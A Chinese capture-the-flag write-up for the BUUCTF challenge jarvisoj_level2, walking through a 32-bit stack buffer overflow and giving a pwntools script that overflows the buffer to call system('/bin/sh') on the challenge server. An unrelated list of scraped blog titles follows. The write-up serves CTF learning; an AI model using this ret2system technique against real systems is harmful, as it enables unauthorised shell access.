[BUUCTF]PWN16——jarvisoj_level2

附件

步骤
例行检查,32位,开启了nx保护

试运行一下程序

32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串

双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置,
shell_addr=0x804a024

system_addr=0x8048320

我们可以直接利用这些构造 system(/bin/sh)去执行
跟进试运行时候看到的字符串,找到输入点

buf的大小是0x88,读入的数据大小是0x100,可以溢出0x78个字节,用来构造rop足够

EXP:

from pwn import*r=remote('node3.buuoj.cn',26675)
shell_addr=0x804a024
system=0x8048320payload='a'*(0x88+4)+p32(system)+p32(8)+p32(shell_addr)r.sendline(payload)
r.interactive()

[BUUCTF]PWN16——jarvisoj_level2相关推荐

  1. buuctf jarvisoj_level2 wp

    前期准备 checksec.file等流程 就开了个nx,也就是不准植入shellcode而已 看看ida 有sh字符串,点进去就能得到地址0x0804a024 主函数中能很明显发现有system函数 ...

  2. 持续更新 BUUCTF——PWN(一)

    文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

  3. [BUUCTF]PWN17——[HarekazeCTF2019]baby_rop

    [BUUCTF]PWN17--[HarekazeCTF2019]baby_rop 附件 步骤: 例行检查,64位,开启了NX保护 试运行一下程序,看这个情况,当我们输入太长字符串的时候会报错 64位i ...

  4. BUUCTF的Web真题学习整理(一)

    目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...

  5. [BUUCTF-pwn]——jarvisoj_level2

    [BUUCTF-pwn]--jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 ID ...

  6. BUUCTF寒假刷题-Web

    前言 寒假横向刷题(尽量) BUUCTF

  7. BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过

    BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...

  8. BUUCTF刷题笔记

    BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...

  9. BUUCTF Quoted-printable编码

    Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...

最新文章

  1. Go 学习笔记(5)— 算术运算符、关系运算符、逻辑运算符、位运算符、赋值运算符、取地址和指针运算符
  2. 【LeetCode160】相交链表
  3. 【CodeForces - 122B 】Lucky Substring (字符串,水题)
  4. Windows下的SQL Server备份文件BAK在Linux环境下还原遇到的问题
  5. Win10下Eclipse运行环境的安装
  6. android真机调试
  7. RubyonRails是WebDev最佳选择的5个原因
  8. 桌面图标有蓝底怎么办?
  9. 常用的计算机硬件软件英语,计算机英语常用词汇.ppt
  10. 50行实现C语言FM收音机-Taskbus Stdio封装器在SDR课程中的应用
  11. 国内主流加密芯片分析
  12. 从实验室研发到大规模生产 纳晶科技量子点技术商用多点开花
  13. android6.0 Bluetooth蓝牙源码流程笔记
  14. Python练习14:天天向上的力量I
  15. 逆向路径转发 linux,RPF(Reverse Path Forwarding 反向路径转发)技术
  16. k8s:kubeadm搭建k8s集群,加入新master节点报错
  17. 如果你想通过自媒体赚钱,平台规则必须了如指掌,才能月入10W+
  18. cbc系统是指_制动力分配(EBD/CBC等)
  19. 新人要怎么快速适应融入工作呢?
  20. Part4 大型総合スーパー編(1)---業務プロセスを理解する

热门文章

  1. 文本情感分析综述[哈工大2010]笔记
  2. SpringBoo Mybatis Druid配置多数据源
  3. 安装nvida-docker2
  4. mysql中autocommit,start transaction和begin/commit的异同
  5. terraform笔记
  6. 秒懂边缘云 | 3场直播带你了解下个技术风口
  7. 乔布斯 :斯坦福大学演讲
  8. 大数据项目之数据采集总结(三)
  9. Springboot整合squirrel-foundation状态机
  10. 天龙八部怎么找不到服务器,win7系统天龙八部无法打开服务器列表的解决方法...